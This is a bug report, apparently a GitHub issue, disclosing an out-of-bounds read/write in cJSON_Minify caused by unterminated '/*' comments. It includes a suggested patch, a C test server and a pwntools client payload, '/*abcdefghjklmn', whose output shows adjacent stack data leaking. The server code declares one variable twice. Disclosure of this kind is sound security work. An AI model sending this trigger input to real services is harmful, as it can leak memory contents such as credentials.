cJSON_Minify cross-border read&write 2 #338
Description
https://github.com/DaveGamble/cJSON/blob/master/cJSON.c : 2669
this bug can delete \x00, cross-border read&write, and if use str* API result will fault, cause some logical problem, such as stack&heapoverflow, leak info etc..
else if ((*json == '/') && (json[1] == '*'))
{
/* multiline comments. */
while (*json && !((*json == '*') && (json[1] == '/')))
{
json++;
}
json += 2;
}this should be code as below:
else if ((*json == '/') && (json[1] == '*'))
{
/* multiline comments. */
while (*json && !((*json == '*') && (json[1] == '/')))
{
json++;
}
if(!(*json))
{
/* break or return */
}
json += 2;
}just leak stack data for test
server.c
int main(int argc, const char* argv[]) {
int lfd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in serv_addr;
memset(&serv_addr, 0, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(880);
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(lfd, (struct sockaddr*)&serv_addr, sizeof(serv_addr));
listen(lfd, 64);
struct sockaddr_in clien_addr;
socklen_t clien_len = sizeof(clien_addr);
int cfd = accept(lfd, (struct sockaddr*)&clien_addr, &clien_len);
char ipbuf[128];
printf("client iP: %s, port: %d\n", inet_ntop(AF_INET, &clien_addr.sin_addr.s_addr, ipbuf, sizeof(ipbuf)),
ntohs(clien_addr.sin_port));
char leakdata1[16] = "passwordpassword";
char buf[16] = {0};
char leakdata1[16] = "passwordpassword";
memset(buf, 0, 16);
while(1) {
int len = read(cfd, buf, sizeof(buf));
printf("recv bufdata = %s\n", buf);
cJSON_Minify(buf);
printf("After cJSON_Minify, bufdata:\n%s\n", buf);
}
close(cfd);
close(lfd);
return 0;
}client just send data(15bytes, not buf overflow) as below,
from pwn import *
p = remote('127.0.0.1', 880)
p.send('/*abcdefghjklmn')
raw_input('waiting...')
output:
client iP: 127.0.0.1, prot: 39284
recv bufdata = /*abcdefghjklmn
After cJSON_Minify, bufdata:
asswordpassword127.0.0.1